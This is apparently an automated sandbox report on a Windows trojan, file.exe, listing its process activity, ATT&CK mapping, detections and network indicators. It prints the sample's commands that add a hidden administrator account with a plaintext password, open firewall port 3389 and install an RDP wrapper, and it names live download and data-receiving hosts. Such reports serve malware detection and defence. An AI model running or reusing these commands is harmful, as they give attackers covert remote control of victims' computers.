                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File written: C:\Program Files\RDP Wrapper\rdpwrap.ini
                            Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressedlB source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            Source: file.exe, QXNzZW1ibHlMb2FkZXJB.cs .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Source: Yara match File source: file.exe, type: SAMPLE
                            Source: Yara match File source: 1.0.file.exe.6d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
                            Source: file.exe Static PE information: 0x880A0FF9 [Tue Apr 29 05:07:05 2042 UTC]
                            Source: file.exe Static PE information: section name: .text entropy: 7.995759768210477

                            Persistence and Installation Behavior

                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /add
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Program Files\RDP Wrapper\rdpwrap.dll
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Windows\System32\rfxvmt.dll
                            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                            Source: C:\Windows\System32\drivers\tsusbhub.sys Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0043B58C OpenSCManagerW, GetLastError, OpenServiceW, GetLastError, StartServiceW, GetLastError, Sleep, StartServiceW, CloseServiceHandle, CloseServiceHandle, 4_2_0043B58C
                            Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
                            Source: C:\Users\user\Desktop\file.exe Memory allocated: 1140000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\file.exe Memory allocated: 2CE0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\file.exe Memory allocated: 2A50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: OpenSCManagerW, GetLastError, EnumServicesStatusExW, GetLastError, CloseServiceHandle, EnumServicesStatusExW, CloseServiceHandle, GetLastError, CloseServiceHandle, 4_2_0043B7D4
                            Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 3112
                            Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 710
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
                            Source: C:\Users\user\Desktop\file.exe TID: 7496 Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\Desktop\file.exe TID: 7536 Thread sleep count: 3112 > 30
                            Source: C:\Users\user\Desktop\file.exe TID: 7540 Thread sleep count: 710 > 30
                            Source: C:\Users\user\Desktop\file.exe TID: 8076 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\file.exe TID: 7496 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_004092D8 FindFirstFileW, FindClose, 4_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0040F73C FindFirstFileW, FindClose, 4_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_00408EB9 lstrcpynW, FindFirstFileW, FindClose, lstrlenW, lstrcpynW, lstrlenW, lstrcpynW, 4_2_00408EB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_00409D02 GetSystemInfo, 4_2_00409D02
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: file.exe, 00000001.00000002.1799416851.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                            Source: file.exe, 00000001.00000002.1800235734.0000000003001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.000000000300F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                            Source: net1.exe, 00000017.00000002.1745753972.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V AdministratorsA4VV
                            Source: net1.exe, 00000017.00000002.1745753972.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                            Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,4_2_004093C0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00408908
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW,4_2_00412C4A
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW,4_2_00412C4C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW,4_2_00412C98
                            Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_00411154 GetLocalTime,4_2_00411154
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_00414698 GetVersionExW,4_2_00414698
                            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

                            Remote Access Functionality

                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections
                            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                            Execution: 111 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                            Persistence: 1 LSASS Driver; 1 DLL Side-Loading; 1 Create Account; 21 Windows Service; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                            Privilege Escalation: 1 LSASS Driver; 1 DLL Side-Loading; 1 Access Token Manipulation; 21 Windows Service; 11 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                            Defense Evasion: 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 22 Masquerading; 141 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
                            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                            Discovery: 1 System Time Discovery; 1 System Service Discovery; 2 File and Directory Discovery; 128 System Information Discovery; 211 Security Software Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing; Network Service Discovery
                            Lateral Movement: 2 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                            Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                            Command and Control: 12 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                            Behavior Graph (ID: 1523922, Sample: file.exe, Startdate: 02/10/2024, Architecture: WINDOWS, Score: 100)

                            Source | Detection | Scanner | Label | Link
                            file.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                            file.exe | 35% | Virustotal | | Browse
                            file.exe | 100% | Joe Sandbox ML | |

                            Source | Detection | Scanner | Label | Link
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 100% | Joe Sandbox ML | |
                            C:\Program Files\RDP Wrapper\rdpwrap.dll | 54% | ReversingLabs | Win64.PUA.RDPWrapper |
                            C:\Program Files\RDP Wrapper\rdpwrap.dll | 57% | Virustotal | | Browse
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 68% | ReversingLabs | Win32.PUA.RDPWrap |
                            C:\Windows\System32\rfxvmt.dll | 0% | ReversingLabs | |

                            No Antivirus matches

                            Source | Detection | Scanner | Label | Link
                            api.ipify.org | 0% | Virustotal | | Browse

                            Source | Detection | Scanner | Label | Link
                            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
                            http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                            http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus. | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus/issues/54 | 0% | Virustotal | | Browse
                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | 23% | Virustotal | | Browse
                            http://www.apache.org/licenses/ | 0% | Virustotal | | Browse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU | 0% | Virustotal | | Browse
                            https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/ | 11% | Virustotal | | Browse
                            https://github.com/lontivero/Open.Nat/issuesOAlso | 0% | Virustotal | | Browse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | 2% | Virustotal | | Browse
                            https://loremflickr.com | 0% | Virustotal | | Browse
                            https://picsum.photos | 0% | Virustotal | | Browse
                            https://placeimg.com | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus/issues/115 | 0% | Virustotal | | Browse
                            http://api.ipify.org | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus/wiki/Bogus-Premium | 0% | Virustotal | | Browse
                            http://stascorp.com/load/1-1-0-62 | 1% | Virustotal | | Browse
                            https://via.placeholder.com/ | 0% | Virustotal | | Browse
                            https://hansgborn.eu/core/receive.php | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus | 0% | Virustotal | | Browse
                            http://api.ipify.org/ | 0% | Virustotal | | Browse
                            https://github.com/bchavez/Bogus: | 0% | Virustotal | | Browse
                            http://147.45.44.104 | 22% | Virustotal | | Browse

                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            hansgborn.eu | 188.114.97.3 | true | false | | unknown
                            api.ipify.org | 104.26.13.205 | true | false | | unknown

                            Name | Malicious | Antivirus Detection | Reputation
                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | false | | unknown
                            https://hansgborn.eu/core/receive.php | false | | unknown
